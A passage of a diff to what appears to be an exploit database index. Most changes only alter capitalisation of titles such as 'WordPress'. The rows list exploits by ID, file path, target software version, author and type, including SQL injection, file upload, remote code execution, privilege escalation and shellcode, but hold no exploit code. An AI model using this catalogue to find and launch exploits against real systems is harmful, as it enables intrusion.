Z.",windows,dos,0 -38792,platforms/windows/local/38792.txt,"NVIDIA Stereoscopic 3D Driver Service 7.17.13.5382 - Arbitrary Run Key Creation",2015-11-23,"Google Security Research",windows,local,0 +38792,platforms/windows/local/38792.txt,"Nvidia Stereoscopic 3D Driver Service 7.17.13.5382 - Arbitrary Run Key Creation",2015-11-23,"Google Security Research",windows,local,0 38793,platforms/windows/dos/38793.txt,"Windows ndis.sys IOCTL 0x170034 (ndis!ndisNsiGetIfNameForIfIndex) - Pool Buffer Overflow (MS15-117)",2015-11-23,"Nils Sommer",windows,dos,0 38794,platforms/windows/dos/38794.txt,"Windows Cursor - Object Potential Memory Leak (MS15-115)",2015-11-23,"Nils Sommer",windows,dos,0 38795,platforms/windows/dos/38795.txt,"Windows - Race Condition DestroySMWP Use-After-Free (MS15-115)",2015-11-23,"Nils Sommer",windows,dos,0 @@ -35069,10 +35069,10 @@ id,file,description,date,author,platform,type,port 38805,platforms/multiple/remote/38805.txt,"SAP Sybase Adaptive Server Enterprise - XML External Entity Information Disclosure",2015-11-25,"Igor Bulatenko",multiple,remote,0 38806,platforms/cgi/webapps/38806.txt,"Bugzilla - 'editflagtypes.cgi' Multiple Cross-Site Scripting Vulnerabilities",2013-10-09,"Mateusz Goik",cgi,webapps,0 38807,platforms/cgi/webapps/38807.txt,"Bugzilla 4.2 - Tabular Reports Unspecified Cross-Site Scripting",2013-10-09,"Mateusz Goik",cgi,webapps,0 -38808,platforms/php/webapps/38808.txt,"WordPress WP-Realty Plugin - 'listing_id' Parameter SQL Injection",2013-10-08,Napsterakos,php,webapps,0 +38808,platforms/php/webapps/38808.txt,"Wordpress WP-Realty Plugin - 'listing_id' Parameter SQL Injection",2013-10-08,Napsterakos,php,webapps,0 38809,platforms/php/remote/38809.php,"PHP Point Of Sale - 'ofc_upload_image.php' Remote Code Execution",2013-10-18,Gabby,php,remote,0 38810,platforms/hardware/remote/38810.py,"Multiple Vendors - 'RuntimeDiagnosticPing()' Stack Buffer Overflow",2013-10-14,"Craig Heffner",hardware,remote,0 -38811,platforms/php/webapps/38811.txt,"WordPress Daily Deal Theme - Arbitrary File Upload",2013-10-23,DevilScreaM,php,webapps,0 +38811,platforms/php/webapps/38811.txt,"Wordpress Daily Deal Theme - Arbitrary File Upload",2013-10-23,DevilScreaM,php,webapps,0 38812,platforms/multiple/remote/38812.txt,"DELL Quest One Password Manager - CAPTCHA Security Bypass",2011-10-21,"Johnny Bravo",multiple,remote,0 38813,platforms/multiple/remote/38813.txt,"Apache Shindig - XML External Entity Information Disclosure",2013-10-21,"Kousuke Ebihara",multiple,remote,0 38814,platforms/php/webapps/38814.php,"Joomla! Maian15 Component - 'name' Parameter Arbitrary File Upload",2013-10-20,SultanHaikal,php,webapps,0 @@ -35081,7 +35081,7 @@ id,file,description,date,author,platform,type,port 38817,platforms/linux/local/38817.txt,"Poppler 0.14.3 - '/utils/pdfseparate.cc' Local Format String",2013-10-26,"Daniel Kahn Gillmor",linux,local,0 38818,platforms/multiple/remote/38818.xml,"Openbravo ERP - XML External Entity Information Disclosure",2013-10-30,"Tod Beardsley",multiple,remote,0 38819,platforms/php/webapps/38819.txt,"Course Registration Management System - Cross-Site Scripting / SQL Injection",2013-10-21,"Omar Kurt",php,webapps,0 -38820,platforms/php/webapps/38820.php,"WordPress This Way Theme - 'upload_settings_image.php' Arbitrary File Upload",2013-11-01,Bet0,php,webapps,0 +38820,platforms/php/webapps/38820.php,"Wordpress This Way Theme - 'upload_settings_image.php' Arbitrary File Upload",2013-11-01,Bet0,php,webapps,0 38821,platforms/android/remote/38821.py,"Google Android - Signature Verification Security Bypass",2013-11-04,"Jay Freeman",android,remote,0 38822,platforms/windows/webapps/38822.rb,"Sysaid Helpdesk Software 14.4.32 b25 - SQL Injection (Metasploit)",2015-11-28,hland,windows,webapps,8080 38831,platforms/php/webapps/38831.txt,"HumHub 0.11.2 / 0.20.0-beta.2 - SQL Injection",2015-11-30,"LSE Leading Security Experts GmbH",php,webapps,80 @@ -35095,41 +35095,41 @@ id,file,description,date,author,platform,type,port 38832,platforms/linux/local/38832.py,"RHEL 7.0/7.1 - abrt/sosreport Privilege Escalation",2015-12-01,rebel,linux,local,0 38833,platforms/linux/webapps/38833.txt,"Kodi 15 - Arbitrary File Aaccess (Web Interface)",2015-12-01,"Machiel Pronk",linux,webapps,0 38840,platforms/hardware/webapps/38840.txt,"Belkin N150 Wireless Home Router F9K1009 v1 - Multiple Vulnerabilities",2015-12-01,"Rahul Pratap Singh",hardware,webapps,80 -38841,platforms/php/webapps/38841.txt,"Zenphoto 1.4.10 - Local File Inclusion",2015-12-01,hyp3rlinx,php,webapps,80 +38841,platforms/php/webapps/38841.txt,"ZenPhoto 1.4.10 - Local File Inclusion",2015-12-01,hyp3rlinx,php,webapps,80 38842,platforms/php/webapps/38842.txt,"Testa OTMS - Multiple SQL Injections",2013-11-13,"Ashiyane Digital Security Team",php,webapps,0 38843,platforms/php/webapps/38843.txt,"TomatoCart - 'install/rpc.php' Local File Inclusion",2013-11-18,Esac,php,webapps,0 38835,platforms/multiple/local/38835.py,"Centos 7.1/Fedora 22 - abrt Privilege Escalation",2015-12-01,rebel,multiple,local,0 38836,platforms/multiple/webapps/38836.txt,"ntop-ng 2.0.151021 - Privilege Escalation",2015-12-01,"Dolev Farhi",multiple,webapps,0 38837,platforms/php/webapps/38837.txt,"IP.Board 4.1.4.x - Persistent Cross-Site Scripting",2015-12-01,"Mehdi Alouache",php,webapps,0 -38844,platforms/php/webapps/38844.html,"WordPress Blue Wrench Video Widget Plugin - Cross-Site Request Forgery",2013-11-23,"Haider Mahmood",php,webapps,0 +38844,platforms/php/webapps/38844.html,"Wordpress Blue Wrench Video Widget Plugin - Cross-Site Request Forgery",2013-11-23,"Haider Mahmood",php,webapps,0 38845,platforms/multiple/remote/38845.txt,"SKIDATA Freemotion.Gate - Unauthenticated Web Services Multiple Command Execution Vulnerabilities",2013-11-19,"Dennis Kelly",multiple,remote,0 38846,platforms/multiple/remote/38846.txt,"nginx 1.1.17 - URI Processing Security Bypass",2013-11-19,"Ivan Fratric",multiple,remote,0 38847,platforms/windows/local/38847.py,"Acunetix WVS 10 - Privilege Escalation",2015-12-02,"Daniele Linguaglossa",windows,local,0 -38848,platforms/php/webapps/38848.php,"WordPress Suco Themes - 'themify-ajax.php' Arbitrary File Upload",2013-11-20,DevilScreaM,php,webapps,0 +38848,platforms/php/webapps/38848.php,"Wordpress Suco Themes - 'themify-ajax.php' Arbitrary File Upload",2013-11-20,DevilScreaM,php,webapps,0 38849,platforms/cgi/remote/38849.rb,"Advantech Switch - Bash Environment Variable Code Injection (Shellshock)",2015-12-02,Metasploit,cgi,remote,0 38850,platforms/hardware/remote/38850.txt,"Thomson Reuters Velocity Analytics - Remote Code Injection",2013-11-22,"Eduardo Gonzalez",hardware,remote,0 38851,platforms/hardware/remote/38851.html,"LevelOne WBR-3406TX Router - Cross-Site Request Forgery",2013-11-15,"Yakir Wizman",hardware,remote,0 38852,platforms/php/webapps/38852.pl,"phpThumb - 'phpThumb.php' Arbitrary File Upload",2013-12-01,DevilScreaM,php,webapps,0 38853,platforms/hardware/remote/38853.sh,"Multiple D-Link DIR Series Routers - 'model/__show_info.php' Local File Disclosure",2013-12-02,tytusromekiatomek,hardware,remote,0 38854,platforms/linux/dos/38854.sh,"Net-SNMP - SNMPD AgentX Subagent Timeout Denial of Service",2012-09-05,"Ken Farnen",linux,dos,0 -38855,platforms/php/webapps/38855.txt,"WordPress Users Ultra Plugin 1.5.50 - Blind SQL Injection",2015-12-03,"Panagiotis Vagenas",php,webapps,0 -38856,platforms/php/webapps/38856.txt,"WordPress Users Ultra Plugin 1.5.50 - Persistent Cross-Site Scripting",2015-12-03,"Panagiotis Vagenas",php,webapps,0 +38855,platforms/php/webapps/38855.txt,"Wordpress Users Ultra Plugin 1.5.50 - Blind SQL Injection",2015-12-03,"Panagiotis Vagenas",php,webapps,0 +38856,platforms/php/webapps/38856.txt,"Wordpress Users Ultra Plugin 1.5.50 - Persistent Cross-Site Scripting",2015-12-03,"Panagiotis Vagenas",php,webapps,0 38857,platforms/linux/dos/38857.txt,"Gnome Nautilus 3.16 - Denial of Service",2015-12-03,"Panagiotis Vagenas",linux,dos,0 38858,platforms/windows/dos/38858.txt,"Malwarebytes Antivirus 2.2.0 - Denial of Service PoC",2015-12-03,"Francis Provencher",windows,dos,0 38859,platforms/windows/remote/38859.rb,"Oracle BeeHive 2 - voice-servlet processEvaluation()",2015-12-03,Metasploit,windows,remote,7777 38860,platforms/windows/remote/38860.rb,"Oracle BeeHive 2 - voice-servlet prepareAudioToPlay() Arbitrary File Upload",2015-12-03,Metasploit,windows,remote,7777 -38861,platforms/php/webapps/38861.txt,"WordPress Gwolle Guestbook Plugin 1.5.3 - Remote File Inclusion",2015-12-03,"High-Tech Bridge SA",php,webapps,0 +38861,platforms/php/webapps/38861.txt,"Wordpress Gwolle GuestBook Plugin 1.5.3 - Remote File Inclusion",2015-12-03,"High-Tech Bridge SA",php,webapps,0 38862,platforms/php/webapps/38862.txt,"Enorth Webpublisher CMS - 'thisday' Parameter SQL Injection",2013-12-06,xin.wang,php,webapps,0 38863,platforms/php/webapps/38863.php,"NeoBill - /modules/nullregistrar/phpwhois/example.php query Parameter Remote Code Execution",2013-12-06,KedAns-Dz,php,webapps,0 38864,platforms/php/webapps/38864.php,"NeoBill - /install/include/solidstate.php Multiple Parameter SQL Injection",2013-12-06,KedAns-Dz,php,webapps,0 38865,platforms/php/webapps/38865.txt,"NeoBill - /install/index.php language Parameter Traversal Local File Inclusion",2013-12-06,KedAns-Dz,php,webapps,0 39563,platforms/php/webapps/39563.txt,"Kaltura Community Edition <=11.1.0-2 - Multiple Vulnerabilities",2016-03-15,Security-Assessment.com,php,webapps,80 -38867,platforms/php/webapps/38867.txt,"WordPress Plugin Advanced uploader 2.10 - Multiple Vulnerabilities",2015-12-04,KedAns-Dz,php,webapps,0 -38868,platforms/php/webapps/38868.txt,"WordPress Plugin Sell Download 1.0.16 - Local File Disclosure",2015-12-04,KedAns-Dz,php,webapps,0 -38869,platforms/php/webapps/38869.txt,"WordPress Plugin TheCartPress 1.4.7 - Multiple Vulnerabilities",2015-12-04,KedAns-Dz,php,webapps,0 -38870,platforms/php/webapps/38870.txt,"WordPress Easy Career Openings Plugin - 'jobid' Parameter SQL Injection",2013-12-06,Iranian_Dark_Coders_Team,php,webapps,0 +38867,platforms/php/webapps/38867.txt,"Wordpress Plugin Advanced uploader 2.10 - Multiple Vulnerabilities",2015-12-04,KedAns-Dz,php,webapps,0 +38868,platforms/php/webapps/38868.txt,"Wordpress Plugin Sell Download 1.0.16 - Local File Disclosure",2015-12-04,KedAns-Dz,php,webapps,0 +38869,platforms/php/webapps/38869.txt,"Wordpress Plugin TheCartPress 1.4.7 - Multiple Vulnerabilities",2015-12-04,KedAns-Dz,php,webapps,0 +38870,platforms/php/webapps/38870.txt,"Wordpress Easy Career Openings Plugin - 'jobid' Parameter SQL Injection",2013-12-06,Iranian_Dark_Coders_Team,php,webapps,0 38871,platforms/windows/local/38871.txt,"Cyclope Employee Surveillance 8.6.1 - Insecure File Permissions",2015-12-06,loneferret,windows,local,0 -38872,platforms/php/webapps/38872.php,"WordPress PhotoSmash Galleries Plugin - 'bwbps-uploader.php' Arbitrary File Upload",2013-12-08,"Ashiyane Digital Security Team",php,webapps,0 +38872,platforms/php/webapps/38872.php,"Wordpress PhotoSmash Galleries Plugin - 'bwbps-uploader.php' Arbitrary File Upload",2013-12-08,"Ashiyane Digital Security Team",php,webapps,0 38873,platforms/php/webapps/38873.txt,"eduTrac - 'showmask' Parameter Directory Traversal",2013-12-11,"High-Tech Bridge",php,webapps,0 38874,platforms/php/webapps/38874.txt,"BoastMachine - 'blog' Parameter SQL Injection",2013-12-13,"Omar Kurt",php,webapps,0 38875,platforms/php/webapps/38875.php,"osCMax - Arbitrary File Upload / Full Path Information Disclosure",2013-12-09,KedAns-Dz,php,webapps,0 @@ -35157,7 +35157,7 @@ id,file,description,date,author,platform,type,port 38899,platforms/xml/webapps/38899.txt,"OpenMRS 2.3 (1.11.4) - Local File Disclosure",2015-12-08,LiquidWorm,xml,webapps,0 38900,platforms/php/remote/38900.rb,"phpFileManager 0.9.8 - Remote Code Execution",2015-12-08,Metasploit,php,remote,80 38901,platforms/php/webapps/38901.txt,"PHP Utility Belt - Remote Code Execution",2015-12-08,WICS,php,webapps,80 -38902,platforms/php/webapps/38902.txt,"WordPress Polls Widget Plugin 1.0.7 - SQL Injection",2015-12-08,WICS,php,webapps,80 +38902,platforms/php/webapps/38902.txt,"Wordpress Polls Widget Plugin 1.0.7 - SQL Injection",2015-12-08,WICS,php,webapps,80 38903,platforms/windows/local/38903.txt,"iniNet SpiderControl SCADA Web Server Service 2.02 - Insecure File Permissions",2015-12-08,LiquidWorm,windows,local,0 38904,platforms/windows/local/38904.txt,"iniNet SpiderControl PLC Editor Simatic 6.30.04 - Insecure File Permissions",2015-12-08,LiquidWorm,windows,local,0 38905,platforms/multiple/remote/38905.rb,"Atlassian HipChat for Jira Plugin - Velocity Template Injection",2015-12-08,Metasploit,multiple,remote,8080 @@ -35170,16 +35170,16 @@ id,file,description,date,author,platform,type,port 38912,platforms/windows/remote/38912.txt,"Microsoft Windows Media Center - .Link File Incorrectly Resolved Reference",2015-12-09,"Core Security",windows,remote,0 38913,platforms/hardware/webapps/38913.txt,"WIMAX LX350P(WIXFMR-108) - Multiple Vulnerabilities",2015-12-09,alimp5,hardware,webapps,0 38914,platforms/hardware/webapps/38914.txt,"WIMAX MT711x - Multiple Vulnerabilities",2015-12-09,alimp5,hardware,webapps,0 -38915,platforms/php/webapps/38915.txt,"WordPress Plugin WP Easy Poll 1.1.3 - Cross-Site Scripting / Cross-Site Request Forgery",2015-12-09,Mysticism,php,webapps,80 +38915,platforms/php/webapps/38915.txt,"Wordpress Plugin WP Easy Poll 1.1.3 - Cross-Site Scripting / Cross-Site Request Forgery",2015-12-09,Mysticism,php,webapps,80 38916,platforms/windows/dos/38916.html,"Microsoft Internet Explorer 11.0.9600.18097 - COmWindowProxy::SwitchMarkup NULL PTR",2015-12-09,"Marcin Ressel",windows,dos,0 -38917,platforms/osx/dos/38917.txt,"MacOS X 10.11 - FTS Deep Structure of the File System Buffer Overflow",2015-12-09,"Maksymilian Arciemowicz",osx,dos,0 +38917,platforms/osx/dos/38917.txt,"Mac OSX 10.11 - FTS Deep Structure of the File System Buffer Overflow",2015-12-09,"Maksymilian Arciemowicz",osx,dos,0 38918,platforms/windows/remote/38918.txt,"Microsoft Office / COM Object - els.dll DLL Planting (MS15-134)",2015-12-09,"Google Security Research",windows,remote,0 38919,platforms/php/webapps/38919.txt,"JForum 'adminUsers' Module - Cross-Site Request Forgery",2013-12-26,arno,php,webapps,0 38920,platforms/php/webapps/38920.txt,"AFCommerce - /afcontrol/adblock.php rootpathtocart Parameter Remote File Inclusion",2013-12-25,NoGe,php,webapps,0 38921,platforms/php/webapps/38921.txt,"AFCommerce - /afcontrol/adminpassword.php rootpathtocart Parameter Remote File Inclusion",2013-12-25,NoGe,php,webapps,0 38922,platforms/php/webapps/38922.txt,"AFCommerce - /afcontrol/controlheader.php rootpathtocart Parameter Remote File Inclusion",2013-12-25,NoGe,php,webapps,0 38923,platforms/windows/remote/38923.txt,"Apple Safari For Windows - PhishingAlert Security Bypass",2013-12-07,Jackmasa,windows,remote,0 -38924,platforms/php/webapps/38924.txt,"WordPress 2.0.11 - '/wp-admin/options-discussion.php' Script Cross-Site Request Forgery",2013-12-17,MustLive,php,webapps,0 +38924,platforms/php/webapps/38924.txt,"Wordpress 2.0.11 - '/wp-admin/options-discussion.php' Script Cross-Site Request Forgery",2013-12-17,MustLive,php,webapps,0 38927,platforms/php/webapps/38927.txt,"iy10 Dizin Scripti - Multiple Vulnerabilities",2015-12-10,KnocKout,php,webapps,80 38928,platforms/php/webapps/38928.txt,"Gökhan Balbal Script 2.0 - Cross-Site Request Forgery",2015-12-10,KnocKout,php,webapps,80 38929,platforms/hardware/webapps/38929.txt,"Skybox Platform <=7.0.611 - Multiple Vulnerabilities",2015-12-10,"SEC Consult",hardware,webapps,8443 @@ -35189,7 +35189,7 @@ id,file,description,date,author,platform,type,port 38933,platforms/multiple/dos/38933.txt,"Avast - Heap Overflow Unpacking MoleBox Archives",2015-12-10,"Google Security Research",multiple,dos,0 38934,platforms/windows/dos/38934.txt,"Avast - Integer Overflow Verifying numFonts in TTC Header",2015-12-10,"Google Security Research",windows,dos,0 38935,platforms/asp/webapps/38935.txt,"CMS Afroditi - 'id' Parameter SQL Injection",2013-12-30,"projectzero labs",asp,webapps,0 -38936,platforms/php/webapps/38936.txt,"Advanced Dewplayer Plugin for WordPress - 'download-file.php' Script Directory Traversal",2013-12-30,"Henri Salo",php,webapps,0 +38936,platforms/php/webapps/38936.txt,"Advanced Dewplayer Plugin for Wordpress - 'download-file.php' Script Directory Traversal",2013-12-30,"Henri Salo",php,webapps,0 38937,platforms/linux/local/38937.txt,"Apache Libcloud Digital Ocean API - Local Information Disclosure",2014-01-01,anonymous,linux,local,0 38938,platforms/php/webapps/38938.txt,"xBoard - 'post' Parameter Local File Inclusion",2013-12-24,"TUNISIAN CYBER",php,webapps,0 38939,platforms/multiple/dos/38939.c,"VLC Media Player 1.1.11 - '.NSV' File Denial of Service",2012-03-14,"Dan Fosco",multiple,dos,0 @@ -35214,7 +35214,7 @@ id,file,description,date,author,platform,type,port 38958,platforms/php/webapps/38958.html,"Command School Student Management System - /sw/add_topic.php Topic Creation Cross-Site Request Forgery",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0 38959,platforms/generator/shellcode/38959.py,"Windows XP < 10 - WinExec Null Free Shellcode (Python) (Generator)",2015-12-13,B3mB4m,generator,shellcode,0 38965,platforms/php/webapps/38965.txt,"ECommerceMajor - productdtl.php (prodid) SQL Injection",2015-12-14,"Rahul Pratap Singh",php,webapps,80 -38966,platforms/php/webapps/38966.txt,"WordPress Admin Management Xtended Plugin 2.4.0 - Privilege escalation",2015-12-14,"Kacper Szurek",php,webapps,80 +38966,platforms/php/webapps/38966.txt,"Wordpress Admin Management Xtended Plugin 2.4.0 - Privilege escalation",2015-12-14,"Kacper Szurek",php,webapps,80 39096,platforms/php/webapps/39096.txt,"i-doit Pro - 'objID' Parameter SQL Injection",2014-02-17,"Stephan Rickauer",php,webapps,0 39097,platforms/linux/remote/39097.txt,"Red Hat Piranha - Remote Security Bypass",2013-12-11,"Andreas Schiermeier",linux,remote,0 39098,platforms/php/webapps/39098.txt,"Joomla! Wire Immogest Component - 'index.php' SQL Injection",2014-02-17,MR.XpR,php,webapps,0 @@ -35310,11 +35310,11 @@ id,file,description,date,author,platform,type,port 39055,platforms/windows/dos/39055.txt,"Adobe Flash MovieClip.attachMovie - Use-After-Free",2015-12-18,"Google Security Research",windows,dos,0 39056,platforms/windows/dos/39056.txt,"Adobe Flash MovieClip.localToGlobal - Use-After-Free",2015-12-18,"Google Security Research",windows,dos,0 39058,platforms/php/webapps/39058.txt,"Imageview - 'upload.php' Arbitrary File Upload",2014-01-21,"TUNISIAN CYBER",php,webapps,0 -39059,platforms/php/webapps/39059.txt,"WordPress Global Flash Gallery Plugin - 'swfupload.php' Arbitrary File Upload",2014-01-18,"Ashiyane Digital Security Team",php,webapps,0 +39059,platforms/php/webapps/39059.txt,"Wordpress Global Flash Gallery Plugin - 'swfupload.php' Arbitrary File Upload",2014-01-18,"Ashiyane Digital Security Team",php,webapps,0 39060,platforms/php/webapps/39060.txt,"XOS Shop - 'goto' Parameter SQL Injection",2014-01-24,JoKeR_StEx,php,webapps,0 39061,platforms/android/local/39061.txt,"GoToMeeting for Android - Multiple Local Information Disclosure Vulnerabilities",2014-01-23,"Claudio J. Lacayo",android,local,0 39062,platforms/php/webapps/39062.txt,"ZenPhoto - SQL Injection",2014-01-24,KedAns-Dz,php,webapps,0 -39063,platforms/php/webapps/39063.txt,"WordPress WP e-Commerce Plugin - Multiple Security Vulnerabilities",2014-01-24,KedAns-Dz,php,webapps,0 +39063,platforms/php/webapps/39063.txt,"Wordpress WP e-Commerce Plugin - Multiple Security Vulnerabilities",2014-01-24,KedAns-Dz,php,webapps,0 39064,platforms/php/webapps/39064.txt,"Maian Uploader 4.0 - Multiple Security Vulnerabilities",2014-01-24,KedAns-Dz,php,webapps,0 39065,platforms/php/webapps/39065.txt,"Eventum - Insecure File Permissions",2014-01-27,"High-Tech Bridge",php,webapps,0 39066,platforms/php/webapps/39066.txt,"Eventum - 'hostname' Parameter Remote Code Execution",2014-01-28,"High-Tech Bridge",php,webapps,0 @@ -35338,24 +35338,24 @@ id,file,description,date,author,platform,type,port 39084,platforms/php/webapps/39084.txt,"Grawlix 1.0.3 - Cross-Site Request Forgery",2015-12-23,"Curesec Research Team",php,webapps,80 39085,platforms/php/webapps/39085.txt,"Arastta 1.1.5 - SQL Injection",2015-12-23,"Curesec Research Team",php,webapps,80 39086,platforms/php/webapps/39086.txt,"PhpSocial 2.0.0304_20222226 - Cross-Site Request Forgery",2015-12-23,"Curesec Research Team",php,webapps,80 -39087,platforms/php/webapps/39087.txt,"Singapore 0.9.9 b beta - Image Gallery Remote File Inclusion / Cross-Site Scripting",2014-02-05,"TUNISIAN CYBER",php,webapps,0 +39087,platforms/php/webapps/39087.txt,"Singapore 0.9.9 b Beta - Image Gallery Remote File Inclusion / Cross-Site Scripting",2014-02-05,"TUNISIAN CYBER",php,webapps,0 39088,platforms/php/webapps/39088.txt,"Joomla! Projoom NovaSFH Plugin - 'upload.php' Arbitrary File Upload",2013-12-13,"Yuri Kramarz",php,webapps,0 39089,platforms/hardware/remote/39089.txt,"NETGEAR D6300B - /diag.cgi IPAddr4 Parameter Remote Command Execution",2014-02-05,"Marcel Mangold",hardware,remote,0 -39090,platforms/php/webapps/39090.php,"WordPress Kiddo Theme - Arbitrary File Upload",2014-02-05,"TUNISIAN CYBER",php,webapps,0 +39090,platforms/php/webapps/39090.php,"Wordpress Kiddo Theme - Arbitrary File Upload",2014-02-05,"TUNISIAN CYBER",php,webapps,0 39091,platforms/php/dos/39091.pl,"WHMCS 5.12 - 'cart.php' Denial of Service",2014-02-07,Amir,php,dos,0 39092,platforms/php/dos/39092.pl,"phpBB 3.0.8 - Remote Denial of Service",2014-02-11,Amir,php,dos,0 39093,platforms/php/webapps/39093.txt,"Beezfud - Remote Code Execution",2015-12-24,"Ashiyane Digital Security Team",php,webapps,80 39094,platforms/php/webapps/39094.txt,"Rips Scanner 0.5 - (code.php) Local File Inclusion",2015-12-24,"Ashiyane Digital Security Team",php,webapps,80 -39100,platforms/php/webapps/39100.txt,"WordPress NextGEN Gallery Plugin - 'jqueryFileTree.php' Directory Traversal",2014-02-19,"Tom Adams",php,webapps,0 +39100,platforms/php/webapps/39100.txt,"Wordpress NextGEN Gallery Plugin - 'jqueryFileTree.php' Directory Traversal",2014-02-19,"Tom Adams",php,webapps,0 39101,platforms/php/webapps/39101.php,"MODx Evogallery Module - 'uploadify.php' Arbitrary File Upload",2014-02-18,"TUNISIAN CYBER",php,webapps,0 39102,platforms/windows/local/39102.py,"EasyCafe Server 2.2.14 - Remote File Read",2015-12-26,R-73eN,windows,local,0 39103,platforms/windows/dos/39103.txt,"AccessDiver 4.301 - Buffer Overflow",2015-12-26,hyp3rlinx,windows,dos,0 39106,platforms/asp/webapps/39106.txt,"eshtery CMS - 'FileManager.aspx' Local File Disclosure",2014-02-22,peng.deng,asp,webapps,0 39107,platforms/php/webapps/39107.txt,"ATutor - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2014-02-22,HauntIT,php,webapps,0 39108,platforms/php/webapps/39108.txt,"POSH 3.1.x - 'addtoapplication.php' SQL Injection",2014-02-26,"Anthony BAUBE",php,webapps,0 -39109,platforms/php/webapps/39109.txt,"WordPress Relevanssi Plugin - 'category_name' Parameter SQL Injection",2014-03-04,anonymous,php,webapps,0 +39109,platforms/php/webapps/39109.txt,"Wordpress Relevanssi Plugin - 'category_name' Parameter SQL Injection",2014-03-04,anonymous,php,webapps,0 39110,platforms/php/webapps/39110.txt,"Cory Jobs Search - 'cid' Parameter SQL Injection",2014-03-05,Slotleet,php,webapps,0 -39111,platforms/php/webapps/39111.php,"WordPress Premium Gallery Manager Plugin - Arbitrary File Upload",2014-03-06,eX-Sh1Ne,php,webapps,0 +39111,platforms/php/webapps/39111.php,"Wordpress Premium Gallery Manager Plugin - Arbitrary File Upload",2014-03-06,eX-Sh1Ne,php,webapps,0 39112,platforms/linux/local/39112.txt,"QNX - .Phgrafx File Enumeration",2014-03-10,cenobyte,linux,local,0 39113,platforms/php/webapps/39113.txt,"Professional Designer E-Store - 'id' Parameter Multiple SQL Injection",2014-03-08,"Nawaf Alkeraithe",php,webapps,0 39114,platforms/ios/remote/39114.txt,"Apple iOS 4.2.1 - 'facetime-audio://' Security Bypass",2014-03-10,"Guillaume Ross",ios,remote,0 @@ -35378,7 +35378,7 @@ id,file,description,date,author,platform,type,port 39132,platforms/windows/local/39132.py,"FTPShell Client 5.24 - Buffer Overflow",2015-12-30,hyp3rlinx,windows,local,0 39133,platforms/php/webapps/39133.php,"Simple Ads Manager 2.9.4.116 - SQL Injection",2015-12-30,"Kacper Szurek",php,webapps,80 39134,platforms/linux/local/39134.txt,"DeleGate 9.9.13 - Privilege Escalation",2015-12-30,"Larry W. Cashdollar",linux,local,0 -39135,platforms/php/webapps/39135.php,"WordPress Felici Theme - 'uploadify.php' Arbitrary File Upload",2014-03-23,"CaFc Versace",php,webapps,0 +39135,platforms/php/webapps/39135.php,"Wordpress Felici Theme - 'uploadify.php' Arbitrary File Upload",2014-03-23,"CaFc Versace",php,webapps,0 39136,platforms/php/webapps/39136.txt,"Symphony 2.2.4 - Cross-Site Request Forgery",2014-03-24,"High-Tech Bridge",php,webapps,0 39137,platforms/cgi/webapps/39137.txt,"Primo Interactive CMS - 'pcm.cgi' Remote Command Execution",2014-03-31,"Felipe Andrian Peixoto",cgi,webapps,0 39138,platforms/hardware/remote/39138.html,"ICOMM 610 Wireless Modem - Cross-Site Request Forgery",2014-04-12,"Blessen Thomas",hardware,remote,0 @@ -35390,14 +35390,14 @@ id,file,description,date,author,platform,type,port 39144,platforms/windows/dos/39144.html,"Microsoft Internet Explorer 11.0.9600.18124 EdUtil::GetCommonAncestorElement - Denial of Service",2015-12-31,"Marcin Ressel",windows,dos,0 39145,platforms/cgi/webapps/39145.txt,"Xangati XSR And XNR - 'gui_input_test.pl' Remote Command Execution",2014-04-14,"Jan Kadijk",cgi,webapps,0 39146,platforms/php/webapps/39146.txt,"Jigowatt PHP Event Calendar - 'day_view.php' SQL Injection",2014-04-14,"Daniel Godoy",php,webapps,0 -39147,platforms/osx/local/39147.c,"Apple Mac OS X - Local Security Bypass",2014-04-22,"Ian Beer",osx,local,0 +39147,platforms/osx/local/39147.c,"Apple Mac OSX - Local Security Bypass",2014-04-22,"Ian Beer",osx,local,0 39225,platforms/hardware/dos/39225.txt,"Apple watchOS 2 - Crash PoC",2016-01-12,"Mohammad Reza Espargham",hardware,dos,0 39226,platforms/windows/dos/39226.py,"SNScan 1.05 - Scan Hostname/IP Field Buffer Overflow Crash PoC",2016-01-12,"Daniel Velazquez",windows,dos,0 39227,platforms/hardware/remote/39227.txt,"FingerTec Fingerprint Reader - Remote Access and Remote Enrollment",2016-01-12,"Daniel Lawson",hardware,remote,0 39149,platforms/lin_x86-64/shellcode/39149.c,"Linux/x86-64 - Bind TCP Port Shellcode (103 bytes)",2016-01-01,Scorpion_,lin_x86-64,shellcode,0 39150,platforms/php/webapps/39150.txt,"Open Audit - SQL Injection",2016-01-02,"Rahul Pratap Singh",php,webapps,0 39151,platforms/lin_x86-64/shellcode/39151.c,"Linux/x86-64 - Bind 4444/TCP Port Shellcode (103 bytes)",2016-01-02,Scorpion_,lin_x86-64,shellcode,0 -39152,platforms/lin_x86-64/shellcode/39152.c,"Linux/x86-64 - Bindshell 4444/TCP with Password Prompt shellcode (162 bytes)",2016-01-02,"Sathish kumar",lin_x86-64,shellcode,0 +39152,platforms/lin_x86-64/shellcode/39152.c,"Linux/x86-64 - Bindshell 4444/TCP with Password Prompt Shellcode (162 bytes)",2016-01-02,"Sathish kumar",lin_x86-64,shellcode,0 39153,platforms/php/webapps/39153.txt,"iDevAffiliate - 'idevads.php' SQL Injection",2014-04-22,"Robert Cooper",php,webapps,0 39154,platforms/hardware/remote/39154.txt,"Comtrend CT-5361T Router - password.cgi Admin Password Manipulation Cross-Site Request Forgery",2014-04-21,"TUNISIAN CYBER",hardware,remote,0 39155,platforms/linux/remote/39155.txt,"lxml - 'clean_html' Function Security Bypass",2014-04-15,"Maksim Kochkin",linux,remote,0 @@ -35405,7 +35405,7 @@ id,file,description,date,author,platform,type,port 39157,platforms/php/webapps/39157.txt,"Puntopy - 'novedad.php' SQL Injection",2014-04-06,"Felipe Andrian Peixoto",php,webapps,0 39158,platforms/windows/dos/39158.txt,"Advanced Encryption Package Buffer Overflow - Denial of Service",2016-01-03,Vishnu,windows,dos,0 39159,platforms/windows/local/39159.py,"FTPShell Client 5.24 - Add to Favorites Buffer Overflow",2016-01-04,INSECT.B,windows,local,0 -39160,platforms/lin_x86/shellcode/39160.c,"Linux/x86 - execve _/bin/sh_ shellcode (24 bytes)",2016-01-04,"Dennis 'dhn' Herrmann",lin_x86,shellcode,0 +39160,platforms/lin_x86/shellcode/39160.c,"Linux/x86 - execve _/bin/sh_ Shellcode (24 bytes)",2016-01-04,"Dennis 'dhn' Herrmann",lin_x86,shellcode,0 39161,platforms/windows/remote/39161.py,"Rejetto HTTP File Server (HFS) 2.3.x 